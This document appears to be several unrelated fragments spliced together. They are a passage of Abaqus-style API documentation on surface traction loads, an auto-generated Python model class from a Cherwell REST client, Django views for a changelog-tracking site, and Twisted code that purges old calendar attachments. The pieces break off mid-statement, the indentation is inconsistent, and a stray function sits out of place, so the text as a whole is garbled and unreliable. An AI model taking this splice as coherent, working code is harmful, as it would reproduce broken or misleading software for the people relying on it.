*distributionType*=USER_DEFINED.
distributionType
A SymbolicConstant specifying how the surface traction is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
field
A String specifying the name of the AnalyticalField object associated with this load.
The *field* argument applies only when *distributionType*=FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the load has no amplitude reference. The default value is UNSET.
You should provide the *amplitude* argument only if it is valid for the specified step.
angle
A Float specifying an additional rotation of *directionVector* about an axis. The
default value is 0.0.
axis
A SymbolicConstant specifying the axis about which to apply an additional rotation of
*directionVector*. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
AXIS_1.
localCsys
None or a DatumCsys object specifying the local coordinate system of the load's degrees
of freedom. If *localCsys*=None, the degrees of freedom are defined in the global
coordinate system or by the *userCsys* parameter if defined. When this member is
queried, it returns an Int. The default value is None.
userCsys
A String specifying a CSYS defined by a user-subroutine. If *userCsys*=None, the degrees
of freedom are defined in the global coordinate system or by the *localCsys* parameter
if defined. The default value is "None".
directionVector
A VertexArray object of length 2 specifying the direction of the load. Instead of | |
# Source repository: greenpau/pycherwell
# coding: utf-8
"""
Cherwell REST API
Unofficial Python Cherwell REST API library. # noqa: E501
The version of the OpenAPI document: 9.3.2
Contact: See AUTHORS.
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from pycherwell.configuration import Configuration
class Action(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
# Maps each Python attribute name to its OpenAPI type string; used by the
# generated (de)serialization helpers.
openapi_types = {
    'action_command': 'str',
    'action_type': 'str',
    'always_text_and_image': 'bool',
    'begin_group': 'bool',
    'child_actions': 'list[Action]',
    'dependencies': 'list[str]',
    'display_text': 'str',
    'enabled': 'bool',
    'gallery_image': 'str',
    'help_text': 'str',
    'login_enabled_mode': 'str',
    'login_visibility_mode': 'str',
    'name': 'str',
    'parameters': 'list[KeyValuePairStringString]',
    'visible': 'bool'
}
# Maps each Python attribute name to its JSON key in the API payload.
attribute_map = {
    'action_command': 'actionCommand',
    'action_type': 'actionType',
    'always_text_and_image': 'alwaysTextAndImage',
    'begin_group': 'beginGroup',
    'child_actions': 'childActions',
    'dependencies': 'dependencies',
    'display_text': 'displayText',
    'enabled': 'enabled',
    'gallery_image': 'galleryImage',
    'help_text': 'helpText',
    'login_enabled_mode': 'loginEnabledMode',
    'login_visibility_mode': 'loginVisibilityMode',
    'name': 'name',
    'parameters': 'parameters',
    'visible': 'visible'
}
def __init__(self, action_command=None, action_type=None, always_text_and_image=None, begin_group=None, child_actions=None, dependencies=None, display_text=None, enabled=None, gallery_image=None, help_text=None, login_enabled_mode=None, login_visibility_mode=None, name=None, parameters=None, visible=None, local_vars_configuration=None):  # noqa: E501
    """Action - a model defined in OpenAPI.

    All arguments are optional. Only values that are not None are
    assigned, and each assignment goes through the corresponding
    property setter so that client-side validation (where defined)
    is applied.
    """
    if local_vars_configuration is None:
        local_vars_configuration = Configuration()
    self.local_vars_configuration = local_vars_configuration

    # Pair each attribute name with the value that was passed in,
    # preserving the declaration order of ``openapi_types``.
    supplied = (
        ('action_command', action_command),
        ('action_type', action_type),
        ('always_text_and_image', always_text_and_image),
        ('begin_group', begin_group),
        ('child_actions', child_actions),
        ('dependencies', dependencies),
        ('display_text', display_text),
        ('enabled', enabled),
        ('gallery_image', gallery_image),
        ('help_text', help_text),
        ('login_enabled_mode', login_enabled_mode),
        ('login_visibility_mode', login_visibility_mode),
        ('name', name),
        ('parameters', parameters),
        ('visible', visible),
    )

    # Backing fields always exist, even when no value was supplied.
    for attr, _ in supplied:
        setattr(self, '_' + attr, None)
    self.discriminator = None

    # Assign only the explicitly supplied values, via the property
    # setters (``setattr`` on the public name triggers the setter).
    for attr, value in supplied:
        if value is not None:
            setattr(self, attr, value)
@property
def action_command(self):
    """Return the action_command of this Action.

    :return: The action_command of this Action.
    :rtype: str
    """
    return self._action_command


@action_command.setter
def action_command(self, value):
    """Set the action_command of this Action.

    :param value: The new action_command.
    :type: str
    """
    self._action_command = value
@property
def action_type(self):
    """Return the action_type of this Action.

    :return: The action_type of this Action.
    :rtype: str
    """
    return self._action_type


@action_type.setter
def action_type(self, value):
    """Set the action_type of this Action, validating the value.

    :param value: The new action_type.
    :type: str
    :raises ValueError: if client-side validation is enabled and the
        value is not one of the allowed action types.
    """
    # Closed set of action types accepted by the Cherwell API.
    allowed_values = ["None", "OneStep", "Command", "BuiltIn", "Category", "SearchGrp", "Report", "Dashboard", "Calendar", "Visualization", "Group", "Page", "DocRepository", "PortalCommand", "ActionCatalog", "OneStepForRecord"]  # noqa: E501
    validating = self.local_vars_configuration.client_side_validation
    if validating and value not in allowed_values:
        raise ValueError(
            "Invalid value for `action_type` ({0}), must be one of {1}"  # noqa: E501
            .format(value, allowed_values)
        )
    self._action_type = value
@property
def always_text_and_image(self):
    """Return the always_text_and_image flag of this Action.

    :return: The always_text_and_image of this Action.
    :rtype: bool
    """
    return self._always_text_and_image


@always_text_and_image.setter
def always_text_and_image(self, value):
    """Set the always_text_and_image flag of this Action.

    :param value: The new always_text_and_image value.
    :type: bool
    """
    self._always_text_and_image = value


@property
def begin_group(self):
    """Return the begin_group flag of this Action.

    :return: The begin_group of this Action.
    :rtype: bool
    """
    return self._begin_group


@begin_group.setter
def begin_group(self, value):
    """Set the begin_group flag of this Action.

    :param value: The new begin_group value.
    :type: bool
    """
    self._begin_group = value
@property
def child_actions(self):
    """Return the child_actions of this Action.

    :return: The child_actions of this Action.
    :rtype: list[Action]
    """
    return self._child_actions


@child_actions.setter
def child_actions(self, value):
    """Set the child_actions of this Action.

    :param value: The new child_actions list.
    :type: list[Action]
    """
    self._child_actions = value


@property
def dependencies(self):
    """Return the dependencies of this Action.

    :return: The dependencies of this Action.
    :rtype: list[str]
    """
    return self._dependencies


@dependencies.setter
def dependencies(self, value):
    """Set the dependencies of this Action.

    :param value: The new dependencies list.
    :type: list[str]
    """
    self._dependencies = value
@property
def display_text(self):
    """Return the display_text of this Action.

    :return: The display_text of this Action.
    :rtype: str
    """
    return self._display_text


@display_text.setter
def display_text(self, value):
    """Set the display_text of this Action.

    :param value: The new display_text.
    :type: str
    """
    self._display_text = value


@property
def enabled(self):
    """Return the enabled flag of this Action.

    :return: The enabled of this Action.
    :rtype: bool
    """
    return self._enabled


@enabled.setter
def enabled(self, value):
    """Set the enabled flag of this Action.

    :param value: The new enabled value.
    :type: bool
    """
    self._enabled = value
@property
def gallery_image(self):
    """Return the gallery_image of this Action.

    :return: The gallery_image of this Action.
    :rtype: str
    """
    return self._gallery_image


@gallery_image.setter
def gallery_image(self, value):
    """Set the gallery_image of this Action.

    :param value: The new gallery_image.
    :type: str
    """
    self._gallery_image = value


@property
def help_text(self):
    """Return the help_text of this Action.

    :return: The help_text of this Action.
    :rtype: str
    """
    return self._help_text


@help_text.setter
def help_text(self, value):
    """Set the help_text of this Action.

    :param value: The new help_text.
    :type: str
    """
    self._help_text = value
@property
def login_enabled_mode(self):
    """Return the login_enabled_mode of this Action.

    :return: The login_enabled_mode of this Action.
    :rtype: str
    """
    return self._login_enabled_mode


@login_enabled_mode.setter
def login_enabled_mode(self, value):
    """Set the login_enabled_mode of this Action, validating the value.

    :param value: The new login_enabled_mode; one of "Anonymous",
        "LoggedIn" or "Both".
    :type: str
    :raises ValueError: if client-side validation is enabled and the
        value is not allowed.
    """
    allowed_values = ["Anonymous", "LoggedIn", "Both"]  # noqa: E501
    validating = self.local_vars_configuration.client_side_validation
    if validating and value not in allowed_values:
        raise ValueError(
            "Invalid value for `login_enabled_mode` ({0}), must be one of {1}"  # noqa: E501
            .format(value, allowed_values)
        )
    self._login_enabled_mode = value


@property
def login_visibility_mode(self):
    """Return the login_visibility_mode of this Action.

    :return: The login_visibility_mode of this Action.
    :rtype: str
    """
    return self._login_visibility_mode


@login_visibility_mode.setter
def login_visibility_mode(self, value):
    """Set the login_visibility_mode of this Action, validating the value.

    :param value: The new login_visibility_mode; one of "Anonymous",
        "LoggedIn" or "Both".
    :type: str
    :raises ValueError: if client-side validation is enabled and the
        value is not allowed.
    """
    allowed_values = ["Anonymous", "LoggedIn", "Both"]  # noqa: E501
    validating = self.local_vars_configuration.client_side_validation
    if validating and value not in allowed_values:
        raise ValueError(
            "Invalid value for `login_visibility_mode` ({0}), must be one of {1}"  # noqa: E501
            .format(value, allowed_values)
        )
    self._login_visibility_mode = value
@property
def name(self):
    """Return the name of this Action.

    :return: The name of this Action.
    :rtype: str
    """
    return self._name


@name.setter
def name(self, value):
    """Set the name of this Action.

    :param value: The new name.
    :type: str
    """
    self._name = value


@property
def parameters(self):
    """Return the parameters of this Action.

    :return: The parameters of this Action.
    :rtype: list[KeyValuePairStringString]
    """
    return self._parameters


@parameters.setter
def parameters(self, value):
    """Set the parameters of this Action.

    :param value: The new parameters list.
    :type: list[KeyValuePairStringString]
    """
    self._parameters = value


@property
def visible(self):
    """Return the visible flag of this Action.

    :return: The visible of this Action.
    :rtype: bool
    """
    return self._visible


@visible.setter
def visible(self, value):
    """Set the visible flag of this Action.

    :param value: The new visible value.
    :type: bool
    """
    self._visible = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ | |
result['activity_heat_map'] = grouped
def process_description(text):
return re.sub(ur'changelog:(?P<pk>\d+)',
transform_changelog_mention,
text)
return result
class ImmediateResponse(BaseException):
    """Raised to short-circuit view processing with a ready HTTP response.

    It derives from BaseException rather than Exception, presumably so
    that generic ``except Exception`` handlers do not swallow it — the
    response is unwrapped by ``ImmediateMixin.dispatch``.
    """

    def __init__(self, response):
        # The response object to return from the dispatch wrapper.
        self.response = response
class ImmediateMixin(object):
    """View mixin that converts ImmediateResponse exceptions into returns.

    Any code running under ``dispatch`` may raise
    ``ImmediateResponse(resp)`` to abort processing; this mixin catches
    it and returns ``resp`` as the view's response.
    """

    def dispatch(self, *args, **kwargs):
        try:
            return super(ImmediateMixin, self).dispatch(*args, **kwargs)
        except ImmediateResponse as exc:
            return exc.response
class SearchView(ImmediateMixin, CommonContextMixin, TemplateView):
    """Project search.

    Resolution order for the query ``q``:

    1. exact match against known source URLs (redirects to the project),
    2. configured source synonyms (regex patterns),
    3. unknown URLs are forwarded to the "add new project" flow,
    4. finally an exact namespace/name lookup.

    Redirects are raised as ImmediateResponse and unwrapped by
    ImmediateMixin.dispatch.
    """
    template_name = 'allmychanges/search.html'

    def get_context_data(self, **kwargs):
        context = super(SearchView, self).get_context_data(**kwargs)
        # Bug fix: a request without "q" used to crash with
        # AttributeError (None.strip()); treat it as an empty query.
        q = self.request.GET.get('q', '').strip()

        # first, try to find q among source urls
        if '://' in q:
            # then might be it is a URL?
            normalized_url, _, _ = normalize_url(q, for_checkout=False)
            try:
                changelog = Changelog.objects.get(source=normalized_url)
                # Only named changelogs have a public project page.
                if changelog.name is not None:
                    raise ImmediateResponse(
                        HttpResponseRedirect(reverse('project',
                                                     name=changelog.name,
                                                     namespace=changelog.namespace)))
            except Changelog.DoesNotExist:
                pass

        # next, try to find q among synonyms
        synonyms = SourceSynonym.objects.all().values_list('changelog_id', 'source')
        for changelog_id, pattern in synonyms:
            if re.match(pattern, q) is not None:
                changelog = Changelog.objects.get(pk=changelog_id)
                raise ImmediateResponse(
                    HttpResponseRedirect(reverse('project',
                                                 name=changelog.name,
                                                 namespace=changelog.namespace)))

        # if q looks like an URL and we came to this point, then the user
        # entered an unknown url and we redirect him to a page where he
        # can tune a parser and add a new project
        if '://' in q:
            raise ImmediateResponse(
                HttpResponseRedirect(reverse('add-new')
                                     + '?'
                                     + urllib.urlencode({'url': normalized_url})))

        # finally, try to find exact match by namespace and name
        if '/' in q:
            namespace, name = q.split('/', 1)
        elif ' ' in q:
            namespace, name = q.split(' ', 1)
        else:
            namespace = None
            name = q

        params = dict(name=name.strip())
        if namespace:
            params['namespace'] = namespace.strip()

        changelogs = Changelog.objects.filter(**params)
        # A single hit goes straight to the project page.
        if changelogs.count() == 1:
            changelog = changelogs[0]
            raise ImmediateResponse(
                HttpResponseRedirect(reverse('project',
                                             name=changelog.name,
                                             namespace=changelog.namespace)))

        context.update(params)
        context['changelogs'] = changelogs
        context['q'] = q
        return context
class AddNewView(ImmediateMixin, CommonContextMixin, TemplateView):
    """Wizard page for registering a new project from a source URL.

    With no ``url`` GET parameter it renders the bare "add new" page
    (or step 3 of the wizard when ``step3`` is present). With a ``url``
    it looks up or creates a Changelog for the normalized source and
    builds a Preview object the user can tune before saving.
    """
    template_name = 'allmychanges/tune-project.html'

    def get_context_data(self, **kwargs):
        context = super(AddNewView, self).get_context_data(**kwargs)
        context['menu_add_new'] = True
        # Anonymous visitors are tracked via request.light_user instead.
        user = self.request.user if self.request.user.is_authenticated() else None

        url = self.request.GET.get('url')
        if url is None:
            if 'step3' in self.request.GET:
                context['title'] = 'Step 3 of 3'
                context['step3'] = True
        else:
            normalized_url, _, _ = normalize_url(url, for_checkout=False)
            # first, we'll get params from query, if they were given
            params = dict(name=self.request.GET.get('name'),
                          namespace=self.request.GET.get('namespace'),
                          description=self.request.GET.get('description', ''),
                          icon=self.request.GET.get('icon', ''))
            # and finally, we'll try to guess downloader
            # if not params.get('downloader'):
            #     downloaders = guess_downloaders(normalized_url)
            #     params['downloader'] = ','.join(
            #         d['name'] for d in downloaders)
            # else:
            downloaders = []
            # TODO: replace with code inside of downloaders
            # if name was not given, then we'll try to guess it
            # if not params['name']:
            #     guesser = get_namespace_guesser(params['downloader'])
            #     guessed = guesser(normalized_url)
            #     guessed['name'] = Changelog.create_uniq_name(guessed['namespace'],
            #                                                  guessed['name'])
            #     for key, value in guessed.items():
            #         if value:
            #             params[key] = value
            # The icon is not saved into the preview yet.
            icon = params.pop('icon')
            try:
                changelog = Changelog.objects.get(source=normalized_url)
                # An already-named changelog means the project exists:
                # short-circuit to its page.
                if changelog.name is not None:
                    raise ImmediateResponse(
                        HttpResponseRedirect(reverse('project',
                                                     name=changelog.name,
                                                     namespace=changelog.namespace)))
                # NOTE(review): this logs "package-create" although the
                # changelog already existed (it just has no name yet) —
                # confirm that is intended.
                UserHistoryLog.write(self.request.user,
                                     self.request.light_user,
                                     'package-create',
                                     u'User created changelog:{0}'.format(changelog.pk))
            except Changelog.DoesNotExist:
                changelog = Changelog.objects.create(
                    source=normalized_url,
                    icon=icon)
                # Announce newly added projects in the team chat.
                if user:
                    chat.send('Wow, user {user} added project with url: <{url}>'.format(
                        user=user_slack_name(user),
                        url=normalized_url))
                else:
                    chat.send('Wow, light user {0} added project with url: <{1}>'.format(
                        self.request.light_user, normalized_url))
                UserHistoryLog.write(self.request.user,
                                     self.request.light_user,
                                     'package-create',
                                     u'User created changelog:{0}'.format(changelog.pk))
            # Reset any earlier processing problem before rebuilding the
            # preview for this source.
            changelog.problem = None
            changelog.save()
            preview = changelog.create_preview(
                user=user,
                light_user=self.request.light_user,
                **params)
            preview.schedule_update()
            context['changelog'] = changelog
            context['preview'] = preview
            context['can_edit'] = True
            context['downloaders'] = downloaders
            if self.request.user.is_authenticated() and self.request.user.username in settings.ADVANCED_EDITORS:
                context['can_edit_xslt'] = True
        context['mode'] = 'add-new'
        return context
class EditProjectView(ImmediateMixin, CommonContextMixin, TemplateView):
    """Tuning page for an existing changelog (project)."""
    template_name = 'allmychanges/tune-project.html'

    def get_context_data(self, **kwargs):
        context = super(EditProjectView, self).get_context_data(**kwargs)
        lookup = get_keys(kwargs, 'namespace', 'name', 'pk')
        changelog = Changelog.objects.get(**lookup)

        current_user = self.request.user if self.request.user.is_authenticated() else None
        preview = changelog.create_preview(
            user=current_user,
            light_user=self.request.light_user)
        # A changelog with no versions yet gets refreshed right away.
        if changelog.versions.count() == 0:
            preview.schedule_update()

        namespace = changelog.namespace
        name = changelog.name
        context['changelog'] = changelog
        context['title'] = '{0}/{1}'.format(
            namespace or 'unknown',
            name or 'unknown')

        # Offer guessed sources only when no source is configured yet.
        if changelog.source:
            context['guessed_sources'] = []
        else:
            context['guessed_sources'] = guess_source(namespace, name)

        context['preview'] = preview
        context['mode'] = 'edit'
        context['can_edit'] = changelog.editable_by(self.request.user,
                                                    self.request.light_user)
        if self.request.user.is_authenticated() and self.request.user.username in settings.ADVANCED_EDITORS:
            context['can_edit_xslt'] = True
        return context
class DeleteProjectView(ImmediateMixin, CommonContextMixin, View):
    """Deletes a project; restricted to users allowed to edit it."""

    def post(self, request, **kwargs):
        lookup = get_keys(kwargs, 'namespace', 'name', 'pk')
        changelog = get_object_or_404(Changelog, **lookup)

        # only superusers and moderator can delete changelog
        allowed = changelog.editable_by(self.request.user,
                                        self.request.light_user)
        if not allowed:
            raise ImmediateResponse(
                HttpResponse('Access denied', status=403))

        Changelog.objects.filter(pk=changelog.pk).delete()
        return HttpResponseRedirect(reverse('track-list') + '#projects-to-tune')
class MergeProjectView(SuperuserRequiredMixin,
                       CommonContextMixin,
                       TemplateView):
    """Admin-only page for merging one changelog into another.

    GET renders the merge form for the target changelog; POST validates
    the "namespace/name" source, asks for confirmation (``agreed``) and
    finally performs the merge, redirecting to the target project.
    """
    template_name = 'allmychanges/admin/merge-package.html'

    def get_context_data(self, **kwargs):
        context = super(MergeProjectView, self).get_context_data(**kwargs)
        to_changelog = Changelog.objects.get(**kwargs)
        context['to_changelog'] = to_changelog
        return context

    def post(self, request, **kwargs):
        context = self.get_context_data(**kwargs)
        from_changelog = request.POST.get('from_changelog')
        to_changelog = context['to_changelog']
        context['from_changelog_str'] = from_changelog
        agreed = request.POST.get('agreed')

        # Bug fix: the original flagged a malformed value but still fell
        # through to the namespace/name unpacking, which crashed with an
        # unhandled ValueError when the input had no "/" (and with an
        # AttributeError when the field was missing). Parse only when the
        # format is plausible.
        if not from_changelog or from_changelog.count('/') != 1:
            context['error'] = 'Please, use format "namespace/name".'
        else:
            try:
                namespace, name = from_changelog.split('/', 1)
                from_changelog = Changelog.objects.get(
                    namespace=namespace,
                    name=name)
            except Changelog.DoesNotExist:
                context['error'] = 'Changelog not found.'
            else:
                context['from_changelog'] = from_changelog

        if 'error' not in context:
            if to_changelog.pk == from_changelog.pk:
                context['error'] = 'This is the same project, choose another.'

        if 'error' not in context:
            if agreed is None:
                # First valid submission: ask the admin to confirm.
                context['show_agreed'] = True
            else:
                with log.name_and_fields('changelog-merge',
                                         from_changelog=from_changelog.pk,
                                         to_changelog=to_changelog.pk):
                    log.info('Merging changelogs')
                    from_changelog.merge_into(to_changelog)
                project_url = reverse('project', **kwargs)
                return HttpResponseRedirect(project_url)

        return self.render_to_response(context)
class SynonymsView(ImmediateMixin, CommonContextMixin, TemplateView):
    """Lists and adds source synonyms for a project."""
    template_name = 'allmychanges/synonyms.html'

    def _get_changelog_and_check_rights(self, **kwargs):
        # Resolve the changelog and ensure the requester may edit it.
        changelog = Changelog.objects.get(namespace=kwargs['namespace'],
                                          name=kwargs['name'])
        allowed = changelog.editable_by(self.request.user,
                                        self.request.light_user)
        if not allowed:
            raise ImmediateResponse(
                HttpResponse('Access denied', status=403))
        return changelog

    def get_context_data(self, **kwargs):
        context = super(SynonymsView, self).get_context_data(**kwargs)
        context['changelog'] = self._get_changelog_and_check_rights(**kwargs)
        return context

    def post(self, request, **kwargs):
        changelog = self._get_changelog_and_check_rights(**kwargs)
        synonym = request.POST.get('synonym')
        with log.fields(synonym=synonym):
            log.debug('Adding synonym')
            changelog.add_synonym(synonym)
        return HttpResponseRedirect(reverse('synonyms', **kwargs))
class PreviewView(CachedMixin, CommonContextMixin, TemplateView):
    """This view is used to preview how changelog will look like
    at "Add New" page.

    It returns an html fragment to be inserted into the "Add new" page.
    """
    template_name = 'allmychanges/changelog-preview.html'

    def get_cache_params(self, *args, **kwargs):
        # Cache key embeds the preview id and its updated_at timestamp,
        # so the cache invalidates automatically whenever the preview is
        # refreshed.
        preview_id = kwargs['pk']
        self.preview = Preview.objects.get(pk=preview_id)
        cache_key = 'changelog-preview-{0}:{1}'.format(
            self.preview.id,
            int(time.mktime(self.preview.updated_at.timetuple()))
            if self.preview.updated_at is not None
            else 'missing')
        # print 'Cache key:', cache_key
        return cache_key, 4 * HOUR

    def get_context_data(self, **kwargs):
        result = super(PreviewView, self).get_context_data(**kwargs)
        # initially there is no versions in the preview
        # and we'll show versions from changelog if any exist
        preview = self.preview
        changelog = preview.changelog
        if preview.status == 'created':
            obj = changelog
        else:
            obj = preview

        # Before the first successful update the preview has no
        # versions of its own, so filter on preview=None.
        filter_args = {}
        if self.preview.updated_at is not None:
            filter_args['preview'] = self.preview
        else:
            filter_args['preview'] = None

        package_data = get_package_data_for_template(
            obj,
            filter_args,
            10,
            None)

        has_results = len(package_data['versions'])
        if self.preview.status == 'error':
            problem = self.preview.problem
        else:
            # A "successful" run with no versions still means we failed
            # to find a changelog.
            if self.preview.status == 'success' and not has_results:
                problem = 'Unable to find changelog.'
            else:
                problem = None

        result['package'] = package_data
        result['has_results'] = has_results
        result['problem'] = problem

        # TODO: remove all of this and keep only the changelog rendering
        HUMANIZED = {
            'waiting-in-the-queue': 'Waiting in the queue.',
            'downloading': 'Downloading sources.',
            'searching-versions': 'Searching versions.',
            'updating-database': 'Updating database.',
        }
        status = self.preview.get_processing_status()
        result['processing_status'] = HUMANIZED.get(status, status)
        return result

    def post(self, *args, **kwargs):
        # Accepts a JSON payload tuning the preview (search/ignore lists,
        # xslt, source, downloader) and schedules a reprocessing run.
        preview = Preview.objects.get(pk=kwargs['pk'])

        def parse_list(text):
            # Entries may be separated by commas or newlines.
            for line in re.split(r'[\n,]', text):
                yield line.strip()

        # Only the preview's owner (matched by light_user cookie or by
        # the logged-in user) may modify it.
        if preview.light_user == self.request.light_user or (
                self.request.user.is_authenticated() and
                self.request.user == preview.user):
            data = anyjson.deserialize(self.request.read())
            preview.set_search_list(
                parse_list(data.get('search_list', '')))
            preview.set_ignore_list(
                parse_list(data.get('ignore_list', '')))
            preview.xslt = data.get('xslt', '')
            # NOTE(review): downloader is reset when the source changes,
            # then immediately reassigned below — presumably the property
            # setters have side effects; confirm before simplifying.
            if preview.source != data.get('source'):
                preview.downloader = None
            preview.source = data.get('source')
            preview.downloader = data.get('downloader')
            preview.set_status('processing')
            preview.save()
            preview.schedule_update()
        return HttpResponse('ok')
class IndexView(CommonContextMixin, TemplateView):
    """Landing page; authenticated users get a personalised index."""

    def get_context_data(self, **kwargs):
        result = super(IndexView, self).get_context_data(**kwargs)
        # Record which flavour of the page was shown.
        if self.request.user.is_authenticated():
            event, message = 'index-view', 'User opened an index page.'
        else:
            event, message = ('landing-digest-view',
                              'User opened a landing page with digest.')
        UserHistoryLog.write(self.request.user,
                             self.request.light_user,
                             event,
                             message)
        return result

    def get_template_names(self):
        # Logged-in users see the personalised template.
        if self.request.user.is_authenticated():
            return ['allmychanges/login-index.html']
        return ['allmychanges/index.html']
class IssuesFilterForm(forms.Form):
    """Validates the GET parameters accepted by IssuesView."""
    # Truthy to show resolved issues instead of the open ones.
    resolved = forms.BooleanField(required=False)
    # Pagination controls; defaults are applied by the view.
    page = forms.IntegerField(required=False)
    page_size = forms.IntegerField(required=False)
    # Filter by the changelog's namespace/name.
    namespace = forms.CharField(required=False)
    name = forms.CharField(required=False)
    # Filter by issue type.
    type = forms.CharField(required=False)
    # Filter by the reporting user's username.
    username = forms.CharField(required=False)
    # Truthy to keep only issues that carry a light_user marker.
    from_user = forms.BooleanField(required=False)
    # Field name to order the queryset by (e.g. "-importance").
    order = forms.CharField(required=False)
class IssuesView(CommonContextMixin, TemplateView):
template_name = 'allmychanges/issues.html'
def get_context_data(self, **kwargs):
result = super(IssuesView, self).get_context_data(**kwargs)
form = IssuesFilterForm(self.request.GET)
if not form.is_valid():
raise Http404
order_by = form.cleaned_data['order'] or '-importance'
queryset = Issue.objects.order_by(order_by)
page = form.cleaned_data['page'] or 1
page_size = form.cleaned_data['page_size'] or 20
if form.cleaned_data['resolved']:
# if requested, show resolved issues or all
if form.cleaned_data['resolved'] != 'any':
queryset = queryset.exclude(resolved_at=None)
result['title'] = 'Resolved issues'
else:
# by default, show only resolved issues
queryset = queryset.filter(resolved_at=None)
result['title'] = 'Issues'
if form.cleaned_data['namespace']:
result['show_back_button'] = True
queryset = queryset.filter(changelog__namespace=form.cleaned_data['namespace'])
if form.cleaned_data['name']:
queryset = queryset.filter(changelog__name=form.cleaned_data['name'])
if form.cleaned_data['type']:
result['show_back_button'] = True
queryset = queryset.filter(type=form.cleaned_data['type'])
if form.cleaned_data['username']:
queryset = queryset.filter(user__username=form.cleaned_data['username'])
if form.cleaned_data['from_user']:
queryset = queryset.exclude(light_user__isnull=True)
total_count = queryset.count()
skip = (page - 1) * page_size
to = skip + page_size
next_page = page + 1
result['total_issues'] = total_count
result['next_page'] = next_page
result['page_size'] = page_size
result['skip'] = skip
result['to'] = to
result['issues'] = queryset[skip:to]
| |
if user in byuser:
byuser[user] = byuser[user]._replace(managedSize=size, managedCount=count)
else:
byuser[user] = ByUserData(quota=quota, orphanSize=0, orphanCount=0, dropboxSize=0, dropboxCount=0, managedSize=size, managedCount=count)
# Print table of results
table = tables.Table()
table.addHeader(("User", "Current Quota", "Orphan Size", "Orphan Count", "Dropbox Size", "Dropbox Count", "Managed Size", "Managed Count", "Total Size", "Total Count"))
table.setDefaultColumnFormats((
tables.Table.ColumnFormat("%s", tables.Table.ColumnFormat.LEFT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
tables.Table.ColumnFormat("%d", tables.Table.ColumnFormat.RIGHT_JUSTIFY),
))
totals = [0] * 8
for user, data in sorted(byuser.items(), key=lambda x: x[0]):
cols = (
data.orphanSize,
data.orphanCount,
data.dropboxSize,
data.dropboxCount,
data.managedSize,
data.managedCount,
data.orphanSize + data.dropboxSize + data.managedSize,
data.orphanCount + data.dropboxCount + data.managedCount,
)
table.addRow((user, data.quota,) + cols)
for ctr, value in enumerate(cols):
totals[ctr] += value
table.addFooter(("Total:", "",) + tuple(totals))
total = totals[7]
print("\n")
print("Orphaned/Old Attachments by User:\n")
table.printTable()
else:
total = sum([x[3] for x in orphans]) + sum([x[3] for x in dropbox]) + sum([x[3] for x in managed])
return total
@inlineCallbacks
def _orphansPurge(self):
    """Remove orphaned attachments in batches until none remain.

    Runs one store transaction per batch so an interruption loses at most
    ``self.batchSize`` worth of work.  The total number of attachments
    removed is returned via Twisted's ``returnValue``.
    """
    if self.verbose:
        # NOTE(review): the trailing comma looks like the Python 2 idiom for
        # suppressing the newline so batch counts continue this line —
        # confirm against the file's print semantics before restyling.
        print("Removing orphaned attachments...",)
    # -1 is a truthy sentinel so the loop always runs at least once; the
    # store returns 0 once no more orphans are found, ending the loop.
    numOrphansRemoved = -1
    totalRemoved = 0
    while numOrphansRemoved:
        txn = self.store.newTransaction(label="Remove orphaned attachments")
        numOrphansRemoved = yield txn.removeOrphanedAttachments(self.uuid, batchSize=self.batchSize)
        yield txn.commit()
        if numOrphansRemoved:
            totalRemoved += numOrphansRemoved
            if self.verbose:
                # Progress: running total after each batch.
                print(" %d," % (totalRemoved,),)
        elif self.verbose:
            # Terminate the progress line started above.
            print("")
    if self.verbose:
        # Final human-readable summary with correct pluralization.
        if totalRemoved == 0:
            print("No orphaned attachments were removed")
        elif totalRemoved == 1:
            print("1 orphaned attachment was removed in total")
        else:
            print("%d orphaned attachments were removed in total" % (totalRemoved,))
        print("")
    returnValue(totalRemoved)
@inlineCallbacks
def _dropboxPurge(self):
    """Delete old dropbox attachments batch by batch.

    Each batch runs in its own transaction; the loop ends once the store
    reports that nothing further was removed.  The total count is handed
    back through Twisted's ``returnValue``.
    """
    if self.verbose:
        print("Removing old dropbox attachments...",)
    removedThisBatch = -1  # truthy sentinel: always enter the loop once
    removedSoFar = 0
    while removedThisBatch:
        txn = self.store.newTransaction(label="Remove old dropbox attachments")
        removedThisBatch = yield txn.removeOldDropboxAttachments(self.cutoff, self.uuid, batchSize=self.batchSize)
        yield txn.commit()
        if not removedThisBatch:
            # Nothing left — close the progress line and let the loop end.
            if self.verbose:
                print("")
            continue
        removedSoFar += removedThisBatch
        if self.verbose:
            print(" %d," % (removedSoFar,),)
    if self.verbose:
        if removedSoFar == 0:
            print("No old dropbox attachments were removed")
        elif removedSoFar == 1:
            print("1 old dropbox attachment was removed in total")
        else:
            print("%d old dropbox attachments were removed in total" % (removedSoFar,))
        print("")
    returnValue(removedSoFar)
@inlineCallbacks
def _managedPurge(self):
    """Remove old managed attachments in batches until none remain.

    Mirrors ``_orphansPurge``/``_dropboxPurge``: one transaction per batch,
    progress printed when verbose, total returned via ``returnValue``.
    """
    if self.verbose:
        print("Removing old managed attachments...",)
    # -1 is a truthy sentinel so the loop always runs at least once; the
    # store returns 0 when nothing more can be removed, ending the loop.
    numOldRemoved = -1
    totalRemoved = 0
    while numOldRemoved:
        txn = self.store.newTransaction(label="Remove old managed attachments")
